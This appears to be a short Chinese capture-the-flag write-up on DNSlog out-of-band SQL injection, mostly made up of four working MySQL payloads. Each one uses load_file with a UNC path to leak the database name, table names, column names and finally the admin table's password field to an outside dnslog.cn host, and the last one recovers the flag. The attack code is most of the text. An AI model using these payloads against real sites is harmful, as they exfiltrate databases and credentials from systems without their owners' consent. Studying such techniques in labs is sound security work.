盲注太过繁琐,可以尝试用dnslog构造 id=2 and load_file(concat('//',(select database()),'.enxetj.dnslog.cn/abc')) -- qwe 刷新dnslog,发现数据库名为 manzhu,说明可以用dns注入
image
构造 id=2 and load_file(concat('//',(select table_name from information_schema.tables where table_schema=database() limit 0,1),'.ajroyb.dnslog.cn/abc')) -- qwe 查询表名,查到有admin和news表
image
构造 id=2 and load_file(concat('//',(select column_name from information_schema.columns where table_schema=database() and table_name='admin' limit 0,1),'.ajroyb.dnslog.cn/abc')) -- qwe 查询字段,发现有三个字段 id,username,password
image
猜想flag可能会在password字段里,构造 id=2 and load_file(concat('//',(select password from admin limit 0,1),'.ajroyb.dnslog.cn/abc')) -- qwe 发现flag:1flag1good1